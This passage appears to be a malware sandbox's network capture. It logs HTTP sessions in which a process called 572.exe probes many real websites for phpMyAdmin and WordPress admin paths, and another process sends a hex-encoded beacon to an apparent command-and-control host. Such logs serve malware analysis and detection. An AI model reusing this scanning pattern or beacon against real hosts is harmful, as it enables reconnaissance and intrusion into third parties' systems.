alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
289 | 192.168.2.6 | 56922 | 162.241.203.30 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.200486898 CET | 218 | OUT | GET /wp-admin/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://nossoplayer.me/wp-login.php
Feb 5, 2024 12:14:53.316627026 CET | 1114 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 836
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
290 | 192.168.2.6 | 56959 | 172.203.148.34 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.293015003 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: eei.uniandes.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.407543898 CET | 155 | IN | HTTP/1.1 302 Found : Moved Temporarily
Location: https://eei.uniandes.edu.co/phpmyadmin/
Connection: close
Cache-Control: no-cache
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
291 | 192.168.2.6 | 57082 | 104.22.74.220 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.478920937 CET | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: mojadovera.sk
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.607687950 CET | 345 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:53 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:53 GMT
Location: https://mojadovera.sk/phpmyadmin/
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb7c9d726755-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
292 | 192.168.2.6 | 57101 | 35.186.223.180 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.506623030 CET | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: sigapbanjarmasin.info
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.363684893 CET | 469 | IN | HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
Content-Encoding: gzip
Date: Mon, 05 Feb 2024 11:14:54 GMT
Server: Google Frontend
Cache-Control: private
Via: 1.1 google
Transfer-Encoding: chunked
Feb 5, 2024 12:14:54.363837004 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
293 | 192.168.2.6 | 57100 | 104.18.32.109 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.517122984 CET | 181 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.651927948 CET | 613 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:53 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:53 GMT
Location: https://sport.autoplay.cloud/PhpMyAdmin/
Set-Cookie: __cf_bm=Bhkq0x3V4Z4A7t74Lt1f47WvH_uHe9Iv8LFTy1lQ0A8-1707131693-1-AQmaB/vIJkdO2BnPwTI5MCS2HkXhr/kAd+lKIk+xUu4S/r7Mxb8rP904d91urFPRe8LWbvlIaQQhIXZR+2XgYVY=; path=/; expires=Mon, 05-Feb-24 11:44:53 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb7ccbda7bc9-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
294 | 192.168.2.6 | 57103 | 54.183.63.241 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.562803984 CET | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: pt.secure.imvu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.780786037 CET | 1286 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: nginx/1.17.9
X-Powered-By: PHP/8.2.4
Set-Cookie: osCsid=b2f63ea48e4bfb77f14e9d7cdffaf9b7; expires=Mon, 04 Mar 2024 11:14:53 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=b2f63ea48e4bfb77f14e9d7cdffaf9b7; expires=Mon, 04 Mar 2024 11:14:53 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: aw0ZU7Wx77VPHv6
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
295 | 192.168.2.6 | 57025 | 64.190.63.136 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.562805891 CET | 227 | OUT | GET /phpmyadmin/?sub1=20240205-2214-52da-a2cf-fa6f6140149e HTTP/1.1
Host: ww16.followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.773737907 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:14:53 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
296 | 192.168.2.6 | 57089 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.639409065 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:53.876172066 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
297 | 192.168.2.6 | 57084 | 124.237.208.37 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.750916004 CET | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.147237062 CET | 1280 | IN | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:14:53 GMT
Etag: W/"62650964-3feb"
Logid: 8900800306063491885
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=A87D8840E6ACB4C43FA6725E63D037D4:FG=1; expires=Tue, 04-Feb-25 11:14:53 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900800306063491885
Yme: ZIGW/y8rX0gMaTUAUmr/tG1LteUfTQTrqQhFwSCAkA==
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ''SI${B)p6!pS'6frz0zNSTm@Fux8,!&GP`\:0sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T:d2v
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.147273064 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.151076078 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:14:54.364430904 CET | 1280 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900800306063491885
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=A87D8840E6ACB4C43FA6725E63D037D4:FG=1; expires=Tue, 04-Feb-25 11:14:53 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900800306063491885
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0gMaTUAUmr/tG1LteUfTQTrqQhFwSCAkA==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
298 | 192.168.2.6 | 57231 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.800642014 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.923288107 CET | 485 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                                                                                                                                                Server: GSE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
299 | 192.168.2.6 | 57406 | 201.134.41.61 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.811563015 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.973809004 CET | 572 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 342
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
300 | 192.168.2.6 | 57553 | 104.26.14.180 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:53.872972965 CET | 186 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: aeaaamorim.inovarmais.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:54.002130985 CET662INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://aeaaamorim.inovarmais.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L6SUJFt0qLhNUzOHW3K1bakxAQ3fNT1mYbZ8EdTpscdKyuGo4NOHWC2an%2FInILbspv428VnZDlXt3PDB%2B0oWQHuZ6HHbfh7gJksrpd5uOFPTcIMFJdcCkGMsjeGqiKWKpE7tadQBuqexzVw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7f0c8ab087-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
301 | 192.168.2.6 | 57733 | 31.13.65.7 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723061085 CET | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: lookaside.fbsbx.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.824800014 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
Location: https://lookaside.fbsbx.com/phpMyAdmin/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:14:54 GMT
Connection: keep-alive
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
302 | 192.168.2.6 | 57695 | 103.224.182.210 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723145962 CET | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.883073092 CET | 348 | IN | HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:14:54 GMT
server: Apache
set-cookie: __tad=1707131694.6185485; expires=Thu, 02-Feb-2034 11:14:54 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/phpmyadmin/?sub1=20240205-2214-549f-9760-a2fba92ef7f3
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
303 | 192.168.2.6 | 57723 | 54.183.63.241 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723151922 CET | 179 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: pt.secure.imvu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.903379917 CET | 1286 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: nginx/1.17.9
X-Powered-By: PHP/8.2.4
Set-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=3d56c00b3a8b97318c69b3bcd402d268; expires=Mon, 04 Mar 2024 11:14:54 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
x-imvu-rnd: DL5kI03G4GbOn9bDoAu5aSI5S6j7XuU
content-language: pt-br
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
304 | 192.168.2.6 | 57901 | 192.185.5.23 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723330021 CET | 175 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.898683071 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:14:54 GMT
Server: nginx/1.23.4
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Server-Cache: true
X-Proxy-Cache: MISS
Set-Cookie: PHPSESSID=764ba9814f7f85e15ff60014b081960c; path=/
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
305 | 192.168.2.6 | 57922 | 104.21.60.188 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723434925 CET | 173 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: netizion.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.850167990 CET | 667 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:54 GMT
Location: https://netizion.com/phpmyadmin/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2q5xXCRtc4LyFj5cZCnD679Uuqc3KPIW3evm5CC4hs0YZcdPO%2F4rSskcl2dmQyVWt44Xe9rmanl9yHDy%2Bd1m%2FCmq55hUnHKjV64Es7JiEtgSE40%2BYgPD1tylZfFAHGs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb845d5b2447-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
306 | 192.168.2.6 | 57929 | 172.67.148.124 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723510981 CET | 170 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: loopex.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.850372076 CET | 656 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://loopex.io/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cVvDxceun1W2d9XWGVJRThGbl338QTMo03tqmcOvb0JsguOVxBbhHA02buI37aK7OAwsGRoq1EuH%2F30HzLI24HkPlCnPlmcMjSWp7q%2BFMHNZg94m0O82KoJkbzg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb84595469fb-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
307 | 192.168.2.6 | 57897 | 44.233.131.115 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723680019 CET | 181 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.895514011 CET | 386 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:54 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://cloud.simplify3d.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
308 | 192.168.2.6 | 57900 | 200.108.110.164 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723695040 CET | 189 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: midetuvelocidad.claro.com.pe
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:54.908144951 CET | 419 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=45
                                                                                                                                                                                                                                                                                                                                                                Location: https://midetuvelocidad.claro.com.pe/phpmyadmin/?
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
309 | 192.168.2.6 | 57931 | 13.248.169.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:54.723767042 CET | 179 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
